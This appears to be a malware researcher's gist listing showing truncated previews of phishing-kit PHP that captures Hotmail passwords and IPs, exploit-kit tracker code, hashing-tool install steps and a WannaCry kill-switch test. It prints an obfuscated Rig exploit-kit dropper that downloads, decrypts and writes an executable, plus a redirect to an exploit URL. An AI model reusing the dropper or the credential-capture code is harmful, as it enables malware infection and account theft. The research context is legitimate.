View 3d.php
<?php
session_start();
$country = visitor_country();
$ip = $_SERVER['REMOTE_ADDR'];
$login = $_SESSION['clientemail'];
$passwd = $_POST['passwd'];
$sender = 'Hotmail-3D@serverX.com';
$over = 'https://outlook.live.com/owa/?path=/mail/inbox';
View post.php
<?php
$ip = getenv("REMOTE_ADDR");
//Get IP Country City
$url = "http://api.ipinfodb.com/v3/ip-country/?key=bdf624a70b290f75ecdf08f61ba30bb97b946fcd08a5dd35eeaabbc7b6b3f354&ip=$ip";
$url = "http://api.ipinfodb.com/v3/ip-city/?key=bdf624a70b290f75ecdf08f61ba30bb97b946fcd08a5dd35eeaabbc7b6b3f354&ip=$ip";
$ipCountryCityInfo = file_get_contents($url);
//
View spamregurg.py
import httplib2
import os
import base64
import email
import re
from apiclient import errors
from apiclient import discovery
from oauth2client import client
from oauth2client import tools
View README.md

Client Library

An example client library can be found in client.py. To use:

>>> from client import ektracker_client
>>> e = ektracker_client('your_api_key') 

>>> e.add_tag('rig', 'rig exploit kit', [ 'http://www.google.com/', 'http://www.test.com' ], ['.*', '[a-f]{1,}'])
Uploading Tag: {'signatures': ['.*', '[a-f]{1,}'], 'references': ['http://www.google.com/', 'http://www.test.com'], 'name': 'rig', 'description': 'rig exploit kit'}
View README.md
sudo apt-get install cmake
curl -L -O https://github.com/trendmicro/tlsh/archive/v3.4.5.zip
unzip v3.4.5.zip
cd tlsh-3.4.5/
bash make.sh

Python module

View InternetOpenUrl
GET / HTTP/1.1
Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
Cache-Control: no-cache
View WannaCryTest.cpp
/*
A simple test to check the behavior of WannaCry's Kill Switch
functionality. Compile with Visual Studio.
@brad_anton
Example Run:
Set DNS to 208.67.222.222
C:\Users\user\Desktop\WannaCryTest\Debug>WannaCryTest.exe
GOOD: WannaCry would have been aborted!
View ubuntu_sdhash.md

Install Protobuf 2.5

Install protobufs from source. If you try to use a newer version, you'll run into an error related to kEmptyString.

sudo apt-get install autoconf automake libtool curl make g++ unzip
wget https://github.com/google/protobuf/archive/v2.5.0.tar.gz
tar -zxvf v2.5.0.tar.gz
cd protobuf-2.5.0/
View Rig EK Payload
cmd.exe /q /c cd /d "%tmp%" && echo function O(l){var w="pow",j=0x24;return A.round((A[w](j,l+1)-A.random()*A[w](j,l))).toString(j).slice(1)};function V(k){var y=a(e+"."+e+"Request.5.1");y.setProxy(n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y./**/WaitForResponse();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=255,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e.charCodeAt(b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript,o="Object",A=Math,S="etofile",a=Function("b","return u.Create"+o+"(b)");P=(""+u).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=u.Arguments,e="WinH"+"TTP",j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=u[P+"FullName"],E="."+p;s.Type=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v["charCo"+"deAt"](027+v[M]("PE\x00\x00"));s.WriteText
View Seamless Root POST response
$("body").remove();$("html").append("body").html("<div style=\"\"></div>");window.location.href = "http://194.58.38.103/sploit/flow3.php"